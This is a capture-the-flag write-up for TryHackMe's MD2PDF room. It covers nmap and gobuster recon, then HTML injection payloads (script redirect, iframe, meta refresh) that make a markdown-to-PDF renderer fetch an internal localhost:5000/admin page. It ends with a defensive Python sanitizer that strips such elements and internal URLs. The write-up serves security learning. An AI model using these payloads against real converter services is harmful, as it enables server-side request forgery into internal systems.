
MD2PDF (Tryhackme)— Writeup

INTRODUCTION

Hello Hacker!

TopTierConversions LTD is proud to announce its latest and greatest product launch: MD2PDF.

This easy-to-use utility converts markdown files to PDF and is totally secure! Right…?

This is an easy-rated room on TryHackMe that exploits XSS in a PDF converter.

The challenge can be found here: https://tryhackme.com/room/md2pdf

Initial recon - Port scanning

The first step is to conduct a port scan to identify open ports and the services running on them. Let's run nmap.

nmap -sC 10.10.26.251 -o nmap.out
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 07:28 EAT
Nmap scan report for 10.10.26.251
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
| ssh-hostkey: 
|   3072 cd:bd:77:b7:fd:a3:fc:9e:f5:bd:74:30:61:74:2f:24 (RSA)
|   256 0f:f5:6f:f8:39:38:47:a5:89:87:dc:61:3e:4f:8c:32 (ECDSA)
|_  256 67:3e:8a:79:5d:83:12:e6:65:42:11:07:62:15:1e:d2 (ED25519)
80/tcp   open  http
|_http-title: MD2PDF
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 41.90 seconds

Directory Scanning

Let’s scan for directories using gobuster.

gobuster dir -u http://10.10.26.251/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.26.251/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/23 16:41:46 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 166]
/convert              (Status: 405) [Size: 178]

Checking out the Directories

There is an /admin directory. Visiting it returns an interesting message: it is only accessible through localhost:5000/admin.

Test for XSS

To test for this we go back to the root page, http://10.10.26.251/. From here we need a way to reach localhost:5000/admin through the converter.

I try some payloads to see if we get anything interesting.

<script>alert(1)</script>

All of the above just give a blank page instead of fetching the flag. Still, it tells us we are close and only need to adjust the payload.

<script>document.write(document.location.href)</script> returns something interesting.

After trying several variations, I switch to a different approach.

JavaScript Code Injection

Let’s check the page source for clues.

I can try to make the injected script redirect the renderer to the admin page. I finally get working payloads that fetch the flag. :)

<script>
    window.location.href = 'http://localhost:5000/admin';
</script>

<iframe src="http://localhost:5000/admin" height="1000" width="1000">
</iframe>

<meta http-equiv="refresh" content="0;URL='http://localhost:5000/admin'">

And we have the flag.

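The room works because the PDF engine renders whatever raw HTML the markdown contains and fetches localhost:5000/admin on the server's behalf. As an added example that is not part of this post or the room's code, here is a defender-side, stdlib-only Python filter a markdown-to-PDF service could run over the rendered HTML before the PDF engine sees it: it drops script, iframe, meta and similar elements, inline event handlers, javascript: URLs and any URL pointing at localhost or a non-public address, and logs what it removed. The element lists and the names `sanitize` and `is_internal_url` are my own.

```python
# Added example (not the room's code): a defender-side filter for a markdown-to-PDF service.
import html
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

BLOCKED = {"script", "style", "iframe", "frame", "object", "embed", "form", "meta", "link", "base"}
VOID = {"meta", "link", "base"}                 # blocked tags that never have an end tag
URL_ATTRS = {"src", "href", "action", "data"}

def is_internal_url(url: str) -> bool:
    """True for localhost or any non-public IP, i.e. the SSRF target this room's payloads reach."""
    host = urlparse(url.strip()).hostname or ""
    try:
        return not ipaddress.ip_address("127.0.0.1" if host == "localhost" else host).is_global
    except ValueError:
        return False                            # relative URL or an ordinary public hostname

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self._skip = [], [], 0
    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED:                      # drop the element and swallow its body
            self.dropped.append(tag)
            self._skip += tag not in VOID
        elif not self._skip:
            kept = []
            for name, value in attrs:
                value = value or ""
                bad_url = name in URL_ATTRS and (value.lstrip().lower().startswith("javascript:") or is_internal_url(value))
                if name.startswith("on") or bad_url:   # inline handlers, javascript:, internal URLs
                    self.dropped.append(f"{tag}@{name}")
                    continue
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
            self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in BLOCKED:
            self._skip = max(0, self._skip - (tag not in VOID))
        elif not self._skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self._skip:                      # re-escape text so &lt;script&gt; stays literal
            self.out.append(html.escape(data, quote=False))

def sanitize(rendered_html: str):
    s = Sanitizer()                             # returns (clean_html, list of what was removed)
    s.feed(rendered_html)
    s.close()
    return "".join(s.out), s.dropped
```

Logging the `dropped` list is what turns the filter into a detection: a user submitting an iframe pointed at localhost is worth an alert, not just a silent strip.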

HAPPY HACKING

KEEP LEARNING! ♥

This post is licensed under CC BY 4.0 by the author.